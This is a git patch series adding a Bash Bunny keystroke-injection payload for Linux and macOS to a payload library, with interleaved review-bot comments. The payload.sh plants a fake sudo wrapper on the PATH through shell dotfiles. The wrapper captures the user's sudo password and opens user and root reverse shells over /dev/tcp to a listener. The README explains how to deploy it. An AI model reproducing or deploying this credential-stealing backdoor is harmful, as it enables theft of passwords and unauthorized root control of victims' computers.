From 7103031e6e775b10745c6a3ad5bb5f1e0e6cf2de Mon Sep 17 00:00:00 2001
From: root
Date: Fri, 8 May 2020 08:11:07 +0530
Subject: [PATCH 1/9] Updated changes suggested by darren

---
 .../Root_Reverse_Shell_linux_mac/README.md | 17 ++++++
 .../Root_Reverse_Shell_linux_mac/payload.sh | 55 +++++++++++++++++++
 .../Root_Reverse_Shell_linux_mac/payload.txt | 49 +++++++++++++++++
 3 files changed, 121 insertions(+)
 create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
 create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
 create mode 100644 payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
new file mode 100644
index 00000000..253ca4d4
--- /dev/null
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -0,0 +1,17 @@
+# Root_Reverse_Shell_linux_mac
+
+### Since i dont have a bash bunny this is tested in digispark
+### I have converted this script to bash bunny
+### If any issues put in discussion i will fix it
+POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
+### Special thanks to sudobackdoor for bash script sample
+Dont forgot to change IP in payload.sh
+Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
+Because it gives both user shell and root shell
+
+When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
+then executes it and removes the payload.sh.
+
+Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
+
+The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
new file mode 100644
index 00000000..8ce02260
--- /dev/null
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -0,0 +1,55 @@
+#!/bin/bash
+
+if [ ! -d ~/.config/sudo ]
+then
+ mkdir -p ~/.config/sudo
+fi
+
+if [ -f ~/.config/sudo/sudo ]
+then
+ rm ~/.config/sudo/sudo
+fi
+
+
+echo '#!'$SHELL >> ~/.config/sudo/sudo
+cat <<'EOF' >> ~/.config/sudo/sudo
+/usr/bin/sudo -n true 2>/dev/null
+if [ $? -eq 0 ]
+then
+ /usr/bin/sudo $@
+else
+ echo -n "[sudo] password for $USER: "
+ read -s pwd
+ echo
+ echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
+ if [ $? -eq 1 ]
+ then
+ echo "Sorry, try again."
+ sudo $@
+ else
+ /usr/bin/sudo -S $@
+ if [ -f ~/.bash_profile ]
+ then
+ rm ~/.bash_profile
+ mv ~/.darkbash ~/.bash_profile
+ else
+ rm ~/.bashrc
+ mv ~/.darkbashrc ~/.bashrc
+ fi
+ rm ~/.config/sudo/sudo
+ echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
+ fi
+fi
+EOF
+
+chmod u+x ~/.config/sudo/sudo
+if [ -f ~/.bash_profile ]
+then
+ cp ~/.bash_profile ~/.darkbash
+ echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
+else
+ cp ~/.bashrc ~/.darkbashrc
+ echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
+fi
+disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &
+bash
diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
new file mode 100644
index 00000000..9a06e38d
--- /dev/null
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
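Review bot: payload.sh has no header comment, so a reader has to trace the whole script to learn which files it touches; after `#!/bin/bash` add a comment stating that it writes a wrapper script to `~/.config/sudo/sudo`, appends a line putting `~/.config/sudo` at the front of PATH to `~/.bash_profile` or `~/.bashrc`, and keeps a copy of that dotfile. The comment should also say that the dotfile copy is moved back and the wrapper removed only in the branch where `/usr/bin/sudo -S true` accepts the typed password; the `sudo -n true` success path and the `Sorry, try again.` path leave both files in place, which the README's description of the cleanup does not mention.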
@@ -0,0 +1,49 @@
+# Title: Linux/Mac Reverse Shell
+# Author: Darkprince(Sridhar)
+# Version: 1.0
+#
+# Runs a script in the background that gives a user shell initially and waits for user to
+# escalate privileges and give a root reverse shell
+#
+# Magenta..................Setup
+# Red,Green,Blue......Executing
+# Green....................Finished
+
+
+# INITIALIZING
+LED W
+
+# Mac keyboard works in linux and mac
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
+
+LANGUAGE='us'
+
+# Make sure the switch position is 1
+
+# ATTACKING
+LED R G B
+
+# Get linux,mac Termial
+RUN UNITY xterm
+Q DELAY 1000
+# To close opened window by linux run command
+Q GUI Q
+Q CTRL C
+RUN OSX terminal
+Q DELAY 1000
+
+# If linux then clearing 'terminal' which is typed by mac run script
+Q CTRL C
+
+# Executing bash script which is same for mac and linux
+Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh
+
+# The cleanup process will done by bash script
+# Closing the xterm in linux
+# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
+Q GUI Q
+Q CTRL C
+Q STRING exit
+Q ENTER
+
+LED G

From 8c13b961a3dfd9e2eb5a4524e0aa0329d56c0dc9 Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Sat, 16 May 2020 14:08:56 +0530
Subject: [PATCH 2/9] Updated Description

---
 .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
index 253ca4d4..143f5388 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
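Review bot: The LED legend in the new header does not match the commands below it: `# Magenta..................Setup` is paired with `LED W` under `# INITIALIZING`, while the other two entries (`LED R G B`, `LED G`) do match their legend lines. Change the legend line to `# White....................Setup` or switch the command to the magenta LED value so the two agree. Patch 9/9 of this series rewrites the legend and carries the same mismatch.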
@@ -8,9 +8,9 @@ POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFki
 Dont forgot to change IP in payload.sh
 Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
 Because it gives both user shell and root shell
+Make sure switch is in 1st position.
 
-When bash bunny executes payload in a machine wich is neither linux nor mac, it will download the payload.sh from server
-then executes it and removes the payload.sh.
+When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh.
 
 Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
 

From 04d19c4c94c972b621526ca33b8b0d2eb1f18c4a Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Sat, 16 May 2020 14:12:42 +0530
Subject: [PATCH 3/9] Minor changes in description.

---
 .../remote_access/Root_Reverse_Shell_linux_mac/README.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
index 143f5388..b2412da3 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -5,10 +5,10 @@
 ### If any issues put in discussion i will fix it
 POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
 ### Special thanks to sudobackdoor for bash script sample
-Dont forgot to change IP in payload.sh
-Before using this payload don't forgot to start netcat listeners on port 4444 and 1337
-Because it gives both user shell and root shell
-Make sure switch is in 1st position.
+Dont forgot to change IP in payload.sh.
+Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+It reverse connects user shell in port 4444 and root shell in port 1337.
+Make sure switch is in position 1.
 
 When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh.
 

From d8ba87b488289c09db35dca9f389bad68c49a10e Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Sat, 16 May 2020 19:55:43 +0530
Subject: [PATCH 4/9] Corrections in README

---
 .../Root_Reverse_Shell_linux_mac/README.md | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
index b2412da3..6e6c9d56 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/README.md
@@ -5,13 +5,11 @@
 ### If any issues put in discussion i will fix it
 POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
 ### Special thanks to sudobackdoor for bash script sample
-Dont forgot to change IP in payload.sh.
-Before using this payload don't forgot to start netcat listeners on port 4444 and 1337.
+Dont forget to change IP in payload.sh.
+Before using this payload don't forget to start netcat listeners on port 4444 and 1337.
It reverse connects user shell in port 4444 and root shell in port 1337.
Make sure switch is in position 1.
 
-When bash bunny executes payload in a machine wich is neither linux nor mac, it will executes payload.sh.
+Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
 
-Once the payload.sh is executed as explained in the sudobackdoor script it will gets the root credential instead of storing it it will used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
-
-The reason for two netcat connection is user level connection established when script is executed. But to obtain root credenitals it requires time because the user need elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
+The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.

From faa24a329df2d36d23787a9d8bfa9e0092c04a0f Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Sat, 16 May 2020 20:02:21 +0530
Subject: [PATCH 5/9] Minor payload changes.

---
 .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
index 8ce02260..60895f5a 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -31,10 +31,10 @@ else
 if [ -f ~/.bash_profile ]
 then
 rm ~/.bash_profile
- mv ~/.darkbash ~/.bash_profile
+ mv ~/.bash_profile.bak ~/.bash_profile
 else
 rm ~/.bashrc
- mv ~/.darkbashrc ~/.bashrc
+ mv ~/.bashrc.bak ~/.bashrc
 fi
 rm ~/.config/sudo/sudo
 echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
@@ -45,10 +45,10 @@ EOF
 chmod u+x ~/.config/sudo/sudo
 if [ -f ~/.bash_profile ]
 then
- cp ~/.bash_profile ~/.darkbash
+ cp ~/.bash_profile ~/.bash_profile.bak
 echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
 else
- cp ~/.bashrc ~/.darkbashrc
+ cp ~/.bashrc ~/.bashrc.bak
 echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
 fi
 disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &

From 32e41527fb92f019745087ecbebe88b21793f2b1 Mon Sep 17 00:00:00 2001
From: Sridhar
Date: Mon, 1 Jul 2024 10:30:09 +0530
Subject: [PATCH 6/9] Minor update

---
 .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++++--
 .../Root_Reverse_Shell_linux_mac/payload.txt | 3 ++-
 2 files changed, 8 insertions(+), 3 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
index 60895f5a..314a0bf9 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -1,5 +1,9 @@
 #!/bin/bash
 
+LISTENER_IP="127.0.0.1"
+LISTENER1_PORT="1337" #Listener for user shell
+LISTENER2_PORT="9001" #Listener for root shell
+
 if [ ! -d ~/.config/sudo ]
 then
 mkdir -p ~/.config/sudo
@@ -37,7 +41,7 @@ else
 mv ~/.bashrc.bak ~/.bashrc
 fi
 rm ~/.config/sudo/sudo
- echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) &
+ echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) &
 fi
 fi
 EOF
@@ -51,5 +55,5 @@ else
 cp ~/.bashrc ~/.bashrc.bak
 echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
 fi
-disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) &
+disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) &
 bash
diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
index 9a06e38d..76a949dd 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -36,7 +36,8 @@ Q DELAY 1000
 Q CTRL C
 
 # Executing bash script which is same for mac and linux
-Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh
+GET SWITCH_POSITION
+Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
 
 # The cleanup process will done by bash script
 # Closing the xterm in linux

From 00713d6b7f7c5711b7f7e8f7049783d72c97662e Mon Sep 17 00:00:00 2001
From: Sridhar
Date: Mon, 1 Jul 2024 10:33:00 +0530
Subject: [PATCH 7/9] Minor update

---
 .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
index 314a0bf9..7b7cd436 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -2,7 +2,7 @@
 
 LISTENER_IP="127.0.0.1"
 LISTENER1_PORT="1337" #Listener for user shell
-LISTENER2_PORT="9001" #Listener for root shell
+LISTENER2_PORT="4444" #Listener for root shell
 
 if [ ! -d ~/.config/sudo ]
 then

From 94c3342302c3dc8b9ffa5d0f6e2c51f08fb75d78 Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Mon, 1 Jul 2024 10:36:07 +0530
Subject: [PATCH 8/9] Update payload.sh

---
 .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
index 7b7cd436..8bb8fe8b 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh
@@ -1,8 +1,8 @@
 #!/bin/bash
 
 LISTENER_IP="127.0.0.1"
-LISTENER1_PORT="1337" #Listener for user shell
-LISTENER2_PORT="4444" #Listener for root shell
+LISTENER1_PORT="1337" #Listener for root shell
+LISTENER2_PORT="4444" #Listener for user shell
 
 if [ ! -d ~/.config/sudo ]
 then

From 19b4ff63f0838a20685ed3eb647c5522a0f11c02 Mon Sep 17 00:00:00 2001
From: Darkprince <30362337+sridharas04@users.noreply.github.com>
Date: Tue, 23 Jul 2024 17:56:14 +0530
Subject: [PATCH 9/9] Added delay for device recognition

---
 .../Root_Reverse_Shell_linux_mac/payload.txt | 32 +++++++++----------
 1 file changed, 16 insertions(+), 16 deletions(-)

diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
index 76a949dd..bbe4d459 100644
--- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
+++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt
@@ -1,47 +1,47 @@
 # Title: Linux/Mac Reverse Shell
-# Author: Darkprince(Sridhar)
+# Author: Darkprince (Sridhar)
 # Version: 1.0
 #
-# Runs a script in the background that gives a user shell initially and waits for user to
-# escalate privileges and give a root reverse shell
-#
-# Magenta..................Setup
-# Red,Green,Blue......Executing
-# Green....................Finished
+# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell.
+# Magenta..................Setup
+# Red, Green, Blue.........Executing
+# Green....................Finished
 
 
 # INITIALIZING
 LED W
 
-# Mac keyboard works in linux and mac
+# Mac keyboard works in Linux and Mac
 ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
 
 LANGUAGE='us'
 
-# Make sure the switch position is 1
+# Ensure the switch position is 1
+# Delay for HID device recognition
+Q DELAY 1000
 
 # ATTACKING
 LED R G B
 
-# Get linux,mac Termial
+# Get Linux/Mac Terminal
 RUN UNITY xterm
 Q DELAY 1000
-# To close opened window by linux run command
+# To close the opened window by the Linux run command
 Q GUI Q
 Q CTRL C
 RUN OSX terminal
 Q DELAY 1000
 
-# If linux then clearing 'terminal' which is typed by mac run script
+# If Linux, then clearing 'terminal' which is typed by Mac run script
 Q CTRL C
 
-# Executing bash script which is same for mac and linux
+# Execute bash script which is the same for Mac and Linux
 GET SWITCH_POSITION
 Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
 
-# The cleanup process will done by bash script
-# Closing the xterm in linux
-# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal
+# The cleanup process will be handled by the bash script
+# Closing the xterm in Linux
+# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal
 Q GUI Q
 Q CTRL C
 Q STRING exit
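Review bot: `# Version: 1.0` is left unchanged although this commit alters the run sequence by inserting `Q DELAY 1000` ahead of `# ATTACKING`; bump it to `# Version: 1.1` so a user can tell the two payload.txt variants apart from the header alone. The hunk ends at `Q STRING exit`; `Q ENTER` and the closing `LED G` lie outside it.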